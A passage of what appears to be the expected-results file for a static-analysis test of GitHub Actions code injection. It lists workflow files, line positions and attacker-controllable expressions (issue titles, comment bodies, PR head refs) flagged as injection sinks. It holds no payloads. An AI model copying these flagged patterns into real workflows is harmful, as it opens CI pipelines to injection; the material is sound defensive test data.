$@, which may be controlled by an external user ($@). | .github/workflows/issues.yaml:17:19:17:36 | env.job_env | ${{ env.job_env }} | .github/workflows/issues.yaml:1:5:1:10 | issues | issues | +| .github/workflows/issues.yaml:18:19:18:37 | env.step_env | .github/workflows/issues.yaml:20:20:20:50 | github.event.issue.title | .github/workflows/issues.yaml:18:19:18:37 | env.step_env | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/issues.yaml:18:19:18:37 | env.step_env | ${{ env.step_env }} | .github/workflows/issues.yaml:1:5:1:10 | issues | issues | +| .github/workflows/json_wrap.yml:13:20:13:51 | github.event.comment.body | .github/workflows/json_wrap.yml:13:20:13:51 | github.event.comment.body | .github/workflows/json_wrap.yml:13:20:13:51 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/json_wrap.yml:13:20:13:51 | github.event.comment.body | ${{ github.event.comment.body }} | .github/workflows/json_wrap.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/json_wrap.yml:23:31:23:68 | toJSON(github.event.issue.title) | .github/workflows/json_wrap.yml:23:31:23:68 | toJSON(github.event.issue.title) | .github/workflows/json_wrap.yml:23:31:23:68 | toJSON(github.event.issue.title) | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/json_wrap.yml:23:31:23:68 | toJSON(github.event.issue.title) | ${{ toJSON(github.event.issue.title)}} | .github/workflows/json_wrap.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/level0.yml:44:20:44:49 | github.event.issue.body | .github/workflows/level0.yml:44:20:44:49 | github.event.issue.body | .github/workflows/level0.yml:44:20:44:49 | github.event.issue.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/level0.yml:44:20:44:49 | github.event.issue.body | ${{ github.event.issue.body }} | .github/workflows/level0.yml:3:3:3:8 | issues | issues | +| .github/workflows/level0.yml:44:20:44:49 | github.event.issue.body | .github/workflows/level0.yml:44:20:44:49 | github.event.issue.body | .github/workflows/level0.yml:44:20:44:49 | github.event.issue.body | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/level0.yml:44:20:44:49 | github.event.issue.body | ${{ github.event.issue.body }} | .github/workflows/level0.yml:5:3:5:15 | issue_comment | issue_comment | +| .github/workflows/level0.yml:69:35:69:66 | github.event.comment.body | .github/workflows/level0.yml:69:35:69:66 | github.event.comment.body | .github/workflows/level0.yml:69:35:69:66 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/level0.yml:69:35:69:66 | github.event.comment.body | ${{ github.event.comment.body }} | .github/workflows/level0.yml:5:3:5:15 | issue_comment | issue_comment | +| .github/workflows/level1.yml:37:38:37:81 | github.event.workflow_run.head_branch | .github/workflows/level1.yml:37:38:37:81 | github.event.workflow_run.head_branch | .github/workflows/level1.yml:37:38:37:81 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/level1.yml:37:38:37:81 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | .github/workflows/level1.yml:3:3:3:14 | workflow_run | workflow_run | +| .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | ${{ github.event.pull_request.title }} | .github/workflows/pull_request_review.yml:1:5:1:23 | pull_request_review | pull_request_review | +| .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | .github/workflows/pull_request_review.yml:1:5:1:23 | pull_request_review | pull_request_review | +| .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | ${{ github.event.pull_request.head.label }} | .github/workflows/pull_request_review.yml:1:5:1:23 | pull_request_review | pull_request_review | +| .github/workflows/pull_request_review.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_review.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_review.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/pull_request_review.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | ${{ github.event.pull_request.head.repo.default_branch }} | .github/workflows/pull_request_review.yml:1:5:1:23 | pull_request_review | pull_request_review | +| .github/workflows/pull_request_review.yml:11:19:11:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_review.yml:11:19:11:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_review.yml:11:19:11:72 | github.event.pull_request.head.repo.description | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review.yml:11:19:11:72 | github.event.pull_request.head.repo.description | ${{ github.event.pull_request.head.repo.description }} | .github/workflows/pull_request_review.yml:1:5:1:23 | pull_request_review | pull_request_review | +| .github/workflows/pull_request_review.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_review.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_review.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | ${{ github.event.pull_request.head.repo.homepage }} | .github/workflows/pull_request_review.yml:1:5:1:23 | pull_request_review | pull_request_review | +| .github/workflows/pull_request_review.yml:13:19:13:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_review.yml:13:19:13:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_review.yml:13:19:13:59 | github.event.pull_request.head.ref | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/pull_request_review.yml:13:19:13:59 | github.event.pull_request.head.ref | ${{ github.event.pull_request.head.ref }} | .github/workflows/pull_request_review.yml:1:5:1:23 | pull_request_review | pull_request_review | +| .github/workflows/pull_request_review.yml:14:19:14:49 | github.event.review.body | .github/workflows/pull_request_review.yml:14:19:14:49 | github.event.review.body | .github/workflows/pull_request_review.yml:14:19:14:49 | github.event.review.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review.yml:14:19:14:49 | github.event.review.body | ${{ github.event.review.body }} | .github/workflows/pull_request_review.yml:1:5:1:23 | pull_request_review | pull_request_review | +| .github/workflows/pull_request_review_comment.yml:7:19:7:56 | github.event.pull_request.title | .github/workflows/pull_request_review_comment.yml:7:19:7:56 | github.event.pull_request.title | .github/workflows/pull_request_review_comment.yml:7:19:7:56 | github.event.pull_request.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review_comment.yml:7:19:7:56 | github.event.pull_request.title | ${{ github.event.pull_request.title }} | .github/workflows/pull_request_review_comment.yml:1:5:1:31 | pull_request_review_comment | pull_request_review_comment | +| .github/workflows/pull_request_review_comment.yml:8:19:8:55 | github.event.pull_request.body | .github/workflows/pull_request_review_comment.yml:8:19:8:55 | github.event.pull_request.body | .github/workflows/pull_request_review_comment.yml:8:19:8:55 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/pull_request_review_comment.yml:8:19:8:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | .github/workflows/pull_request_review_comment.yml:1:5:1:31 | pull_request_review_comment | pull_request_review_comment | +| .github/workflows/pull_request_review_comment.yml:9:19:9:61 | github.event.pull_request.head.label | .github/workflows/pull_request_review_comment.yml:9:19:9:61 | github.event.pull_request.head.label | .github/workflows/pull_request_review_comment.yml:9:19:9:61 | github.event.pull_request.head.label | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review_comment.yml:9:19:9:61 | github.event.pull_request.head.label | ${{ github.event.pull_request.head.label }} | .github/workflows/pull_request_review_comment.yml:1:5:1:31 | pull_request_review_comment | pull_request_review_comment | +| .github/workflows/pull_request_review_comment.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_review_comment.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_review_comment.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/pull_request_review_comment.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | ${{ github.event.pull_request.head.repo.default_branch }} | .github/workflows/pull_request_review_comment.yml:1:5:1:31 | pull_request_review_comment | pull_request_review_comment | +| .github/workflows/pull_request_review_comment.yml:11:19:11:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_review_comment.yml:11:19:11:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_review_comment.yml:11:19:11:72 | github.event.pull_request.head.repo.description | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review_comment.yml:11:19:11:72 | github.event.pull_request.head.repo.description | ${{ github.event.pull_request.head.repo.description }} | .github/workflows/pull_request_review_comment.yml:1:5:1:31 | pull_request_review_comment | pull_request_review_comment | +| .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | ${{ github.event.pull_request.head.repo.homepage }} | .github/workflows/pull_request_review_comment.yml:1:5:1:31 | pull_request_review_comment | pull_request_review_comment | +| .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | ${{ github.event.pull_request.head.ref }} | .github/workflows/pull_request_review_comment.yml:1:5:1:31 | pull_request_review_comment | pull_request_review_comment | +| .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | ${{ github.event.comment.body }} | .github/workflows/pull_request_review_comment.yml:1:5:1:31 | pull_request_review_comment | pull_request_review_comment | +| .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | ${{ github.event.pull_request.title }} | .github/workflows/pull_request_target.yml:1:5:1:23 | pull_request_target | pull_request_target | +| .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | .github/workflows/pull_request_target.yml:1:5:1:23 | pull_request_target | pull_request_target | +| .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | ${{ github.event.pull_request.head.label }} | .github/workflows/pull_request_target.yml:1:5:1:23 | pull_request_target | pull_request_target | +| .github/workflows/pull_request_target.yml:12:19:12:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_target.yml:12:19:12:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_target.yml:12:19:12:75 | github.event.pull_request.head.repo.default_branch | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/pull_request_target.yml:12:19:12:75 | github.event.pull_request.head.repo.default_branch | ${{ github.event.pull_request.head.repo.default_branch }} | .github/workflows/pull_request_target.yml:1:5:1:23 | pull_request_target | pull_request_target | +| .github/workflows/pull_request_target.yml:13:19:13:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_target.yml:13:19:13:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_target.yml:13:19:13:72 | github.event.pull_request.head.repo.description | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_target.yml:13:19:13:72 | github.event.pull_request.head.repo.description | ${{ github.event.pull_request.head.repo.description }} | .github/workflows/pull_request_target.yml:1:5:1:23 | pull_request_target | pull_request_target | +| .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | ${{ github.event.pull_request.head.repo.homepage }} | .github/workflows/pull_request_target.yml:1:5:1:23 | pull_request_target | pull_request_target | +| .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | ${{ github.event.pull_request.head.ref }} | .github/workflows/pull_request_target.yml:1:5:1:23 | pull_request_target | pull_request_target | +| .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | ${{ github.head_ref }} | .github/workflows/pull_request_target.yml:1:5:1:23 | pull_request_target | pull_request_target | +| .github/workflows/reusable-workflow-2.yml:36:21:36:39 | inputs.taint | .github/workflows/reusable-workflow-caller-2.yml:10:15:10:52 | github.event.pull_request.title | .github/workflows/reusable-workflow-2.yml:36:21:36:39 | inputs.taint | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/reusable-workflow-2.yml:36:21:36:39 | inputs.taint | ${{ inputs.taint }} | .github/workflows/reusable-workflow-caller-2.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/reusable-workflow-2.yml:53:26:53:39 | env.log | .github/workflows/reusable-workflow-2.yml:44:19:44:56 | github.event.pull_request.title | .github/workflows/reusable-workflow-2.yml:53:26:53:39 | env.log | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/reusable-workflow-2.yml:53:26:53:39 | env.log | ${{ env.log }} | .github/workflows/reusable-workflow-caller-2.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/reusable-workflow-2.yml:66:34:66:52 | env.prev_log | .github/workflows/reusable-workflow-2.yml:45:24:45:61 | github.event.changes.title.from | .github/workflows/reusable-workflow-2.yml:66:34:66:52 | env.prev_log | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/reusable-workflow-2.yml:66:34:66:52 | env.prev_log | ${{ env.prev_log }} | .github/workflows/reusable-workflow-caller-2.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/self_needs.yml:19:15:19:47 | steps.source.outputs.value | .github/workflows/self_needs.yml:16:20:16:57 | github.event['comment']['body'] | .github/workflows/self_needs.yml:19:15:19:47 | steps.source.outputs.value | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/self_needs.yml:19:15:19:47 | steps.source.outputs.value | ${{ steps.source.outputs.value }} | .github/workflows/self_needs.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | .github/workflows/self_needs.yml:16:20:16:57 | github.event['comment']['body'] | .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | ${{ needs.test1.outputs.job_output }} | .github/workflows/self_needs.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | .github/workflows/simple2.yml:14:9:18:6 | Uses Step: source | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | ${{ steps.step.outputs.value }} | .github/workflows/simple2.yml:3:6:3:24 | pull_request_target | pull_request_target | +| .github/workflows/simple3.yml:20:31:20:74 | github.event.workflow_run.head_branch | .github/workflows/simple3.yml:20:31:20:74 | github.event.workflow_run.head_branch | .github/workflows/simple3.yml:20:31:20:74 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/simple3.yml:20:31:20:74 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | .github/workflows/simple3.yml:2:3:2:14 | workflow_run | workflow_run | +| .github/workflows/simple3.yml:22:11:22:37 | toJSON(github.event) | .github/workflows/simple3.yml:22:11:22:37 | toJSON(github.event) | .github/workflows/simple3.yml:22:11:22:37 | toJSON(github.event) | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/simple3.yml:22:11:22:37 | toJSON(github.event) | ${{ toJSON(github.event) }} | .github/workflows/simple3.yml:2:3:2:14 | workflow_run | workflow_run | +| .github/workflows/slash_command2.yml:20:21:20:66 | steps.command.outputs.command-arguments | .github/workflows/slash_command2.yml:11:9:20:6 | Uses Step: command | .github/workflows/slash_command2.yml:20:21:20:66 | steps.command.outputs.command-arguments | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/slash_command2.yml:20:21:20:66 | steps.command.outputs.command-arguments | ${{ steps.command.outputs.command-arguments }} | .github/workflows/slash_command2.yml:2:5:2:17 | issue_comment | issue_comment | +| .github/workflows/test1.yml:27:20:27:39 | env.ISSUE_KEY | .github/workflows/test1.yml:23:19:23:56 | github.event.pull_request.title | .github/workflows/test1.yml:27:20:27:39 | env.ISSUE_KEY | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test1.yml:27:20:27:39 | env.ISSUE_KEY | ${{ env.ISSUE_KEY }} | .github/workflows/test1.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test2.yml:27:26:27:66 | steps.changed.outputs.locale_files | .github/workflows/test2.yml:17:9:25:6 | Uses Step: changed | .github/workflows/test2.yml:27:26:27:66 | steps.changed.outputs.locale_files | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test2.yml:27:26:27:66 | steps.changed.outputs.locale_files | ${{ steps.changed.outputs.locale_files }} | .github/workflows/test2.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test2.yml:39:25:39:66 | steps.changed2.outputs.locale_files | .github/workflows/test2.yml:29:9:37:6 | Uses Step: changed2 | .github/workflows/test2.yml:39:25:39:66 | steps.changed2.outputs.locale_files | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test2.yml:39:25:39:66 | steps.changed2.outputs.locale_files | ${{ steps.changed2.outputs.locale_files }} | .github/workflows/test2.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test3.yml:60:27:60:66 | needs.parse-issue.outputs.payload | .github/workflows/test3.yml:13:9:21:2 | Uses Step: issue_body_parser_request | .github/workflows/test3.yml:60:27:60:66 | needs.parse-issue.outputs.payload | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test3.yml:60:27:60:66 | needs.parse-issue.outputs.payload | ${{ needs.parse-issue.outputs.payload }} | .github/workflows/test3.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/test4.yml:15:21:15:55 | toJSON(github.event.comment) | .github/workflows/test4.yml:15:21:15:55 | toJSON(github.event.comment) | .github/workflows/test4.yml:15:21:15:55 | toJSON(github.event.comment) | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test4.yml:15:21:15:55 | toJSON(github.event.comment) | ${{ toJSON(github.event.comment) }} | .github/workflows/test4.yml:3:3:3:15 | issue_comment | issue_comment | +| .github/workflows/test4.yml:19:21:19:53 | toJSON(github.event.issue) | .github/workflows/test4.yml:19:21:19:53 | toJSON(github.event.issue) | .github/workflows/test4.yml:19:21:19:53 | toJSON(github.event.issue) | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test4.yml:19:21:19:53 | toJSON(github.event.issue) | ${{ toJSON(github.event.issue) }} | .github/workflows/test4.yml:3:3:3:15 | issue_comment | issue_comment | +| .github/workflows/test4.yml:27:21:27:47 | toJSON(github.event) | .github/workflows/test4.yml:27:21:27:47 | toJSON(github.event) | .github/workflows/test4.yml:27:21:27:47 | toJSON(github.event) | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test4.yml:27:21:27:47 | toJSON(github.event) | ${{ toJSON(github.event) }} | .github/workflows/test4.yml:3:3:3:15 | issue_comment | issue_comment | +| .github/workflows/test5.yml:12:21:12:64 | toJSON(github.event.comment.body).foo | .github/workflows/test5.yml:12:21:12:64 | toJSON(github.event.comment.body).foo | .github/workflows/test5.yml:12:21:12:64 | toJSON(github.event.comment.body).foo | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test5.yml:12:21:12:64 | toJSON(github.event.comment.body).foo | ${{ toJSON(github.event.comment.body).foo }} | .github/workflows/test5.yml:3:3:3:15 | issue_comment | issue_comment | +| .github/workflows/test7.yml:18:37:18:80 | steps.comment-branch.outputs.head_ref | .github/workflows/test7.yml:9:9:13:6 | Uses Step: comment-branch | .github/workflows/test7.yml:18:37:18:80 | steps.comment-branch.outputs.head_ref | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test7.yml:18:37:18:80 | steps.comment-branch.outputs.head_ref | ${{ steps.comment-branch.outputs.head_ref }} | .github/workflows/test7.yml:2:5:2:17 | issue_comment | issue_comment | +| .github/workflows/test7.yml:20:37:20:70 | steps.refs.outputs.head_ref | .github/workflows/test7.yml:13:9:17:6 | Uses Step: refs | .github/workflows/test7.yml:20:37:20:70 | steps.refs.outputs.head_ref | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test7.yml:20:37:20:70 | steps.refs.outputs.head_ref | ${{ steps.refs.outputs.head_ref }} | .github/workflows/test7.yml:2:5:2:17 | issue_comment | issue_comment | +| .github/workflows/test8.yml:24:76:24:116 | github.event.pull_request.head.ref | .github/workflows/test8.yml:24:76:24:116 | github.event.pull_request.head.ref | .github/workflows/test8.yml:24:76:24:116 | github.event.pull_request.head.ref | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test8.yml:24:76:24:116 | github.event.pull_request.head.ref | ${{ github.event.pull_request.head.ref }} | .github/workflows/test8.yml:3:3:3:21 | pull_request_target | pull_request_target | +| .github/workflows/test8.yml:30:76:30:116 | github.event.pull_request.head.ref | .github/workflows/test8.yml:30:76:30:116 | github.event.pull_request.head.ref | .github/workflows/test8.yml:30:76:30:116 | github.event.pull_request.head.ref | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test8.yml:30:76:30:116 | github.event.pull_request.head.ref | ${{ github.event.pull_request.head.ref }} | .github/workflows/test8.yml:3:3:3:21 | pull_request_target | pull_request_target | +| .github/workflows/test9.yml:20:20:20:73 | steps.issue_body_parser_request.outputs.payload | .github/workflows/test9.yml:12:9:20:6 | Uses Step: issue_body_parser_request | .github/workflows/test9.yml:20:20:20:73 | steps.issue_body_parser_request.outputs.payload | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test9.yml:20:20:20:73 | steps.issue_body_parser_request.outputs.payload | ${{ steps.issue_body_parser_request.outputs.payload }} | .github/workflows/test9.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/test9.yml:25:18:25:57 | needs.parse-issue.outputs.payload | .github/workflows/test9.yml:12:9:20:6 | Uses Step: issue_body_parser_request | .github/workflows/test9.yml:25:18:25:57 | needs.parse-issue.outputs.payload | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test9.yml:25:18:25:57 | needs.parse-issue.outputs.payload | ${{ needs.parse-issue.outputs.payload }} | .github/workflows/test9.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/test9.yml:26:18:26:67 | fromJson(needs.parse-issue.outputs.payload) | .github/workflows/test9.yml:12:9:20:6 | Uses Step: issue_body_parser_request | .github/workflows/test9.yml:26:18:26:67 | fromJson(needs.parse-issue.outputs.payload) | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test9.yml:26:18:26:67 | fromJson(needs.parse-issue.outputs.payload) | ${{ fromJson(needs.parse-issue.outputs.payload) }} | .github/workflows/test9.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/test9.yml:27:18:27:75 | fromJson(needs.parse-issue.outputs.payload).version | .github/workflows/test9.yml:12:9:20:6 | Uses Step: issue_body_parser_request | .github/workflows/test9.yml:27:18:27:75 | fromJson(needs.parse-issue.outputs.payload).version | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test9.yml:27:18:27:75 | fromJson(needs.parse-issue.outputs.payload).version | ${{ fromJson(needs.parse-issue.outputs.payload).version }} | .github/workflows/test9.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/test9.yml:31:42:31:99 | fromJson(needs.parse-issue.outputs.payload).version | .github/workflows/test9.yml:12:9:20:6 | Uses Step: issue_body_parser_request | .github/workflows/test9.yml:31:42:31:99 | fromJson(needs.parse-issue.outputs.payload).version | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test9.yml:31:42:31:99 | fromJson(needs.parse-issue.outputs.payload).version | ${{ fromJson(needs.parse-issue.outputs.payload).version }} | .github/workflows/test9.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/test9.yml:39:42:39:72 | github.event.issue.title | .github/workflows/test9.yml:39:42:39:72 | github.event.issue.title | .github/workflows/test9.yml:39:42:39:72 | github.event.issue.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test9.yml:39:42:39:72 | github.event.issue.title | ${{ github.event.issue.title }} | .github/workflows/test9.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/test11.yml:54:20:54:60 | needs.get-artifacts.outputs.pr_num | .github/workflows/test11.yml:22:9:30:6 | Uses Step | .github/workflows/test11.yml:54:20:54:60 | needs.get-artifacts.outputs.pr_num | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test11.yml:54:20:54:60 | needs.get-artifacts.outputs.pr_num | ${{ needs.get-artifacts.outputs.pr_num }} | .github/workflows/test11.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/test12.yml:10:21:10:67 | github.event.pull_request.title \|\| "foo" | .github/workflows/test12.yml:10:21:10:67 | github.event.pull_request.title \|\| "foo" | .github/workflows/test12.yml:10:21:10:67 | github.event.pull_request.title \|\| "foo" | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test12.yml:10:21:10:67 | github.event.pull_request.title \|\| "foo" | ${{ github.event.pull_request.title \|\| "foo" }} | .github/workflows/test12.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test13.yml:10:21:10:57 | github.event.changes.body.from | .github/workflows/test13.yml:10:21:10:57 | github.event.changes.body.from | .github/workflows/test13.yml:10:21:10:57 | github.event.changes.body.from | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test13.yml:10:21:10:57 | github.event.changes.body.from | ${{ github.event.changes.body.from }} | .github/workflows/test13.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test13.yml:11:21:11:58 | github.event.changes.title.from | .github/workflows/test13.yml:11:21:11:58 | github.event.changes.title.from | .github/workflows/test13.yml:11:21:11:58 | github.event.changes.title.from | Potential code injection in $@, which may be controlled by an external user ($@). 
